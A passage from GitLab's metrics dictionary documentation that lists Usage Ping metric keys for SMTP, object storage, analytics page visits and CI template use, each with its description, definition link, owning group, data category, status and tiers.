`mail.smtp_server` + +The value of the SMTP server that is used + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216174829_smtp_server.yml) + +Group: `group::activation` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `mattermost_enabled` + +Whether Mattermost is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210204124908_mattermost_enabled.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.artifacts.enabled` + +Whether Object Storage is enabled for Artifacts + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180836_enabled.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.artifacts.object_store.background_upload` + +Whether Background Upload for Object Storage is enabled for Artifacts + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180841_background_upload.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.artifacts.object_store.direct_upload` + +Whether Direct Upload for Object Storage is enabled for Artifacts + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180840_direct_upload.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.artifacts.object_store.enabled` + +Whether Object Storage is enabled for Artifacts + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180838_enabled.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.artifacts.object_store.provider` + +What Object Storage provider has been configured for Artifacts + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180843_provider.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.external_diffs.enabled` + +Whether Object Storage is enabled for External Diffs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180845_enabled.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.external_diffs.object_store.background_upload` + +Whether Background Upload for Object Storage is enabled for External Diffs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180851_background_upload.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.external_diffs.object_store.direct_upload` + +Whether Direct Upload for Object Storage is enabled for External Diffs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180849_direct_upload.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.external_diffs.object_store.enabled` + +Whether Object Storage is enabled for External Diffs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180847_enabled.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.external_diffs.object_store.provider` + +What Object Storage provider has been configured for External Diffs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180852_provider.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.lfs.enabled` + +Whether Object Storage is enabled for LFS + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180854_enabled.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.lfs.object_store.background_upload` + +Whether Background Upload for Object Storage is enabled for LFS + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180900_background_upload.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.lfs.object_store.direct_upload` + +Whether Direct Upload for Object Storage is enabled for LFS + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180858_direct_upload.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.lfs.object_store.enabled` + +Whether Object Storage is enabled for LFS + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180856_enabled.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.lfs.object_store.provider` + +What Object Storage provider has been configured for LFS + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180902_provider.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.packages.enabled` + +Whether Object Storage is enabled for Uploads + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180913_enabled.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.packages.object_store.background_upload` + +Whether Background Upload for Object Storage is enabled for Packages + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180918_background_upload.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.packages.object_store.direct_upload` + +Whether Direct Upload for Object Storage is enabled for Packages + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180916_direct_upload.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.packages.object_store.enabled` + +Whether Object Storage is enabled for Packages + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180915_enabled.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.packages.object_store.provider` + +What Object Storage provider has been configured for Packages + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180920_provider.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.uploads.enabled` + +Whether Object Storage is enabled for Uploads + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180903_enabled.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.uploads.object_store.background_upload` + +Whether Background Upload for Object Storage is enabled for Uploads + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180909_background_upload.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.uploads.object_store.direct_upload` + +Whether Direct Upload for Object Storage is enabled for Uploads + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180907_direct_upload.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.uploads.object_store.enabled` + +Whether Object Storage is enabled for Uploads + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180905_enabled.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `object_store.uploads.object_store.provider` + +What Object Storage provider has been configured for Uploads + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210216180911_provider.yml) + +Group: `group::memory` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `omniauth_enabled` + +Whether OmniAuth is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210204124910_omniauth_enabled.yml) + +Group: `group::product intelligence` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `prometheus_enabled` + +Whether the bundled Prometheus is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210204124912_prometheus_enabled.yml) + +Group: `group::product intelligence` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `prometheus_metrics_enabled` + +Whether Prometheus Metrics endpoint is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210204124914_prometheus_metrics_enabled.yml) + +Group: `group::product intelligence` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `recorded_at` + +When the Usage Ping computation was started + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/license/20210201124932_recorded_at.yml) + +Group: `group::product intelligence` + +Data Category: `Standard` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `recording_ce_finished_at` + +When the core features were computed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/license/20210204124938_recording_ce_finished_at.yml) + +Group: `group::product intelligence` + +Data Category: `Standard` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `recording_ee_finished_at` + +When the EE-specific features were computed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/license/20210204124940_recording_ee_finished_at.yml) + +Group: `group::product intelligence` + +Data Category: `Standard` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.analytics.analytics_total_unique_counts_monthly` + +The number of unique users who visited any analytics feature by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175016_analytics_total_unique_counts_monthly.yml) + +Group: `group::optimize` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.analytics.analytics_total_unique_counts_weekly` + +The number of unique users who visited any analytics feature by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216175014_analytics_total_unique_counts_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.analytics.g_analytics_contribution_monthly` + +Unique visitors to /groups/:group/-/contribution_analytics by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216174914_g_analytics_contribution_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.analytics.g_analytics_contribution_weekly` + +Unique visitors to /groups/:group/-/contribution_analytics by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216174912_g_analytics_contribution_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.analytics.g_analytics_insights_monthly` + +Unique visitors to /groups/:group/-/insights/ by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216174918_g_analytics_insights_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.analytics.g_analytics_insights_weekly` + +Unique visitors to /groups/:group/-/insights/ by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216174916_g_analytics_insights_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.analytics.g_analytics_issues_monthly` + +Unique visitors to /groups/:group/-/issues_analytics by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216174921_g_analytics_issues_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.analytics.g_analytics_issues_weekly` + +Unique visitors to /groups/:group/-/issues_analytics by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216174919_g_analytics_issues_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.analytics.g_analytics_merge_request_monthly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175004_g_analytics_merge_request_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free` + +### `redis_hll_counters.analytics.g_analytics_merge_request_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216175002_g_analytics_merge_request_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `removed` + +Tiers: + +### `redis_hll_counters.analytics.g_analytics_productivity_monthly` + +Unique visitors to /groups/:group/-/analytics/productivity_analytics by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216174926_g_analytics_productivity_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.analytics.g_analytics_productivity_weekly` + +Unique visitors to /groups/:group/-/analytics/productivity_analytics by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216174923_g_analytics_productivity_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.analytics.g_analytics_valuestream_monthly` + +Unique visitors to /groups/:group/-/analytics/value_stream_analytics by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216174929_g_analytics_valuestream_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.analytics.g_analytics_valuestream_weekly` + +Unique visitors to /groups/:group/-/analytics/value_stream_analytics by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216174927_g_analytics_valuestream_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.analytics.i_analytics_cohorts_monthly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216174956_i_analytics_cohorts_monthly.yml) + +Group: `group::utilization` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.analytics.i_analytics_cohorts_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216174955_i_analytics_cohorts_weekly.yml) + +Group: `group::utilization` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.analytics.i_analytics_dev_ops_adoption_monthly` + +Counts visits to DevOps Adoption page per month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210401092244_i_analytics_dev_ops_adoption_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.analytics.i_analytics_dev_ops_adoption_weekly` + +Counts visits to DevOps Adoption page per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210401092244_i_analytics_dev_ops_adoption_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.analytics.i_analytics_dev_ops_score_monthly` + +Unique visitors to /admin/dev_ops_report by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175000_i_analytics_dev_ops_score_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.analytics.i_analytics_dev_ops_score_weekly` + +Unique visitors to /admin/dev_ops_report by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216174958_i_analytics_dev_ops_score_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.analytics.i_analytics_instance_statistics_monthly` + +Unique visitors to /admin/usage_trends by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175012_i_analytics_instance_statistics_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.analytics.i_analytics_instance_statistics_weekly` + +Unique visitors to /admin/usage_trends by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216175010_i_analytics_instance_statistics_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.analytics.p_analytics_code_reviews_monthly` + +Unique visitors to /:group/:project/-/analytics/code_reviews by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216174937_p_analytics_code_reviews_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.analytics.p_analytics_code_reviews_weekly` + +Unique visitors to /:group/:project/-/analytics/code_reviews by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216174935_p_analytics_code_reviews_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.analytics.p_analytics_insights_monthly` + +Unique visitors to /:group/:project/insights/ by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216174945_p_analytics_insights_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.analytics.p_analytics_insights_weekly` + +Unique visitors to /:group/:project/insights/ by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216174943_p_analytics_insights_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.analytics.p_analytics_issues_monthly` + +Unique visitors to /:group/:project/-/analytics/issues_analytics by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216174949_p_analytics_issues_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.analytics.p_analytics_issues_weekly` + +Unique visitors to /:group/:project/-/analytics/issues_analytics by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216174947_p_analytics_issues_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.analytics.p_analytics_merge_request_monthly` + +Unique visitors to /:group/:project/-/analytics/merge_request_analytics by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216175008_p_analytics_merge_request_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.analytics.p_analytics_merge_request_weekly` + +Unique visitors to /:group/:project/-/analytics/merge_request_analytics by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216175006_p_analytics_merge_request_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.analytics.p_analytics_pipelines_monthly` + +Unique visitors to /groups/:group/-/analytics/ci_cd by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216174933_p_analytics_pipelines_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.analytics.p_analytics_pipelines_weekly` + +Unique visitors to /groups/:group/-/analytics/ci_cd by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216174931_p_analytics_pipelines_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.analytics.p_analytics_repo_monthly` + +Unique visitors to /:group/:project/-/graphs/master/charts by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216174953_p_analytics_repo_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.analytics.p_analytics_repo_weekly` + +Unique visitors to /:group/:project/-/graphs/master/charts by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216174951_p_analytics_repo_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.analytics.p_analytics_valuestream_monthly` + +Unique visitors to /:group/:project/-/value_stream_analytics by month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216174941_p_analytics_valuestream_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.analytics.p_analytics_valuestream_weekly` + +Unique visitors to /:group/:project/-/value_stream_analytics by week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216174939_p_analytics_valuestream_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.analytics.users_viewing_analytics_group_devops_adoption_monthly` + +Counts visits to DevOps Adoption page per month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210419105414_users_viewing_analytics_group_devops_adoption_monthly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.analytics.users_viewing_analytics_group_devops_adoption_weekly` + +Counts visits to DevOps Adoption page per week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210419105408_users_viewing_analytics_group_devops_adoption_weekly.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.ci_secrets_management.i_ci_secrets_management_vault_build_created_monthly` + +Monthly active users creating pipelines that that have the Vault JWT with it.' + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216184251_i_ci_secrets_management_vault_build_created_monthly.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.ci_secrets_management.i_ci_secrets_management_vault_build_created_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184249_i_ci_secrets_management_vault_build_created_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.ci_templates.ci_templates_total_unique_counts_monthly` + +Total count of pipelines runs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184559_ci_templates_total_unique_counts_monthly.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `broken` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ci_templates.ci_templates_total_unique_counts_weekly` + +Total count of pipelines runs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184557_ci_templates_total_unique_counts_weekly.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `broken` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ci_templates.p_ci_templates_5_min_production_app_monthly` + +Number of projects using 5 min production app CI template in last 7 days. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184517_p_ci_templates_5_min_production_app_monthly.yml) + +Group: `group::5-min-app` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ci_templates.p_ci_templates_5_min_production_app_weekly` + +Number of projects using 5 min production app CI template in last 7 days. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184515_p_ci_templates_5_min_production_app_weekly.yml) + +Group: `group::5-min-app` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ci_templates.p_ci_templates_auto_devops_build_monthly` + +Count of pipelines using the Auto Build template + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184534_p_ci_templates_auto_devops_build_monthly.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ci_templates.p_ci_templates_auto_devops_build_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184532_p_ci_templates_auto_devops_build_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.ci_templates.p_ci_templates_auto_devops_deploy_latest_monthly` + +Count of pipelines using the latest Auto Deploy template + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184542_p_ci_templates_auto_devops_deploy_latest_monthly.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ci_templates.p_ci_templates_auto_devops_deploy_latest_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184540_p_ci_templates_auto_devops_deploy_latest_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.ci_templates.p_ci_templates_auto_devops_deploy_monthly` + +Count of pipelines using the stable Auto Deploy template + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184538_p_ci_templates_auto_devops_deploy_monthly.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ci_templates.p_ci_templates_auto_devops_deploy_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184536_p_ci_templates_auto_devops_deploy_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.ci_templates.p_ci_templates_auto_devops_monthly` + +Count of pipelines using the Auto DevOps template + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184523_p_ci_templates_auto_devops_monthly.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ci_templates.p_ci_templates_auto_devops_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184520_p_ci_templates_auto_devops_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.ci_templates.p_ci_templates_aws_cf_deploy_ec2_monthly` + +Count of projects using `AWS/CF-Provision-and-Deploy-EC2.gitlab-ci.yml` template in last 28 days. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184526_p_ci_templates_aws_cf_deploy_ec2_monthly.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ci_templates.p_ci_templates_aws_cf_deploy_ec2_weekly` + +Count of projects using `AWS/CF-Provision-and-Deploy-EC2.gitlab-ci.yml` template in last 7 days. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184524_p_ci_templates_aws_cf_deploy_ec2_weekly.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ci_templates.p_ci_templates_aws_deploy_ecs_monthly` + +Count of projects using `AWS/Deploy-ECS.gitlab-ci.yml` template in last 28 days. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184530_p_ci_templates_aws_deploy_ecs_monthly.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### 